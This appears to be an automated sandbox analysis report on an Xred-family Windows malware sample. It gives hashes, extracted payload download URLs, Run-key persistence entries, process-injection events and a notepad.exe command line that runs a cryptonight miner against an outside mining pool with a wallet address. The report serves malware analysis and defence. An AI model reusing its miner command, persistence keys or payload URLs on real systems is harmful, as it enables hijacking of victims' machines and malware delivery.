Analysis
-
max time kernel
140s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
30-12-2024 01:41
Behavioral task
behavioral1
Sample
9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe
Resource
win10v2004-20241007-en
General
-
Target
9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe
-
Size
1.6MB
-
MD5
12c15622b2ea89ac2d013e40f3c840c6
-
SHA1
cec0c45eab3f56c9d428599c65b1b3b91e1a8c09
-
SHA256
9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66
-
SHA512
e494348a209a2a18baeab35d1a219651d4088cccad0f27bb04a484f8363bf2fb6f0db493859984b7d3095b0a0a1a06337bfb38fcec1213f8afee548d662b881c
-
SSDEEP
24576:gnsJ39LyjbJkQFMhmC+6GD9mp2gARDzWUHcW5BKDoEnAuB3VcXsQiWfw:gnsHyjtk2MYC5GDzgAxz3HcWv2BmBw
Malware Config
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Signatures
-
Xred family
-
Executes dropped EXE 4 IoCs
pid Process 2876 ._cache_9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe 2772 Synaptics.exe 2540 ._cache_Synaptics.exe 2084 ._cache_Synaptics.exe -
Loads dropped DLL 8 IoCs
pid Process 2092 9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe 2092 9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe 2092 9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe 2092 9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe 2772 Synaptics.exe 2772 Synaptics.exe 2772 Synaptics.exe 2540 ._cache_Synaptics.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" 9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\cCSZUelxYK = "\"C:\\Users\\Admin\\AppData\\Local\\PHYNUZ~1\\CPUCHE~1.EXE\"" ._cache_Synaptics.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2540 set thread context of 2084 2540 ._cache_Synaptics.exe 34 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 236 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2084 ._cache_Synaptics.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2540 ._cache_Synaptics.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 236 EXCEL.EXE -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 2092 wrote to memory of 2876 2092 9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe 30 PID 2092 wrote to memory of 2876 2092 9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe 30 PID 2092 wrote to memory of 2876 2092 9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe 30 PID 2092 wrote to memory of 2876 2092 9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe 30 PID 2092 wrote to memory of 2772 2092 9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe 31 PID 2092 wrote to memory of 2772 2092 9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe 31 PID 2092 wrote to memory of 2772 2092 9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe 31 PID 2092 wrote to memory of 2772 2092 9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe 31 PID 2772 wrote to memory of 2540 2772 Synaptics.exe 32 PID 2772 wrote to memory of 2540 2772 Synaptics.exe 32 PID 2772 wrote to memory of 2540 2772 Synaptics.exe 32 PID 2772 wrote to memory of 2540 2772 Synaptics.exe 32 PID 2540 wrote to memory of 2084 2540 ._cache_Synaptics.exe 34 PID 2540 wrote to memory of 2084 2540 ._cache_Synaptics.exe 34 PID 2540 wrote to memory of 2084 2540 ._cache_Synaptics.exe 34 PID 2540 wrote to memory of 2084 2540 ._cache_Synaptics.exe 34 PID 2540 wrote to memory of 2084 2540 ._cache_Synaptics.exe 34 PID 2540 wrote to memory of 2084 2540 ._cache_Synaptics.exe 34 PID 2540 wrote to memory of 2084 2540 ._cache_Synaptics.exe 34 PID 2540 wrote to memory of 2084 2540 ._cache_Synaptics.exe 34 PID 2540 wrote to memory of 2084 2540 ._cache_Synaptics.exe 34 PID 2540 wrote to memory of 2084 2540 ._cache_Synaptics.exe 34 PID 2084 wrote to memory of 1964 2084 ._cache_Synaptics.exe 35 PID 2084 wrote to memory of 1964 2084 ._cache_Synaptics.exe 35 PID 2084 wrote to memory of 1964 2084 ._cache_Synaptics.exe 35 PID 2084 wrote to memory of 1964 2084 ._cache_Synaptics.exe 35
Processes
-
C:\Users\Admin\AppData\Local\Temp\9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe"C:\Users\Admin\AppData\Local\Temp\9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe"1⤵
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Users\Admin\AppData\Local\Temp\._cache_9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe"C:\Users\Admin\AppData\Local\Temp\._cache_9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2876
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\notepad.exe"C:\Windows\notepad.exe" -a cryptonight -o stratum+tcp://pool.minexmr.com:4444 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQpR48NWyTtgLF8daDK.newminer -p x -t 85⤵PID:1964
-
-
-
-
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:236
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.6MB
MD512c15622b2ea89ac2d013e40f3c840c6
SHA1cec0c45eab3f56c9d428599c65b1b3b91e1a8c09
SHA2569da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66
SHA512e494348a209a2a18baeab35d1a219651d4088cccad0f27bb04a484f8363bf2fb6f0db493859984b7d3095b0a0a1a06337bfb38fcec1213f8afee548d662b881c
-
C:\Users\Admin\AppData\Local\Temp\._cache_9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe
Filesize924KB
MD5e636189bce45b8bde5a59464b108cca4
SHA1828201fd6561fd992d80d40fd7c1432552f32211
SHA25686170ddd6b618ee94b8049da9486adff45f98979d62be8b4fd99f6fc6f0994f2
SHA51296887f07d155616d0905cca11d900e1020a8b28e79e6ddf665223c2a91d6ae774d6343d62836e6ad532911baf4abee93b58cafb452d360a63b4304bc9d469720
-
Filesize
17KB
MD5e566fc53051035e1e6fd0ed1823de0f9
SHA100bc96c48b98676ecd67e81a6f1d7754e4156044
SHA2568e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15
SHA512a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04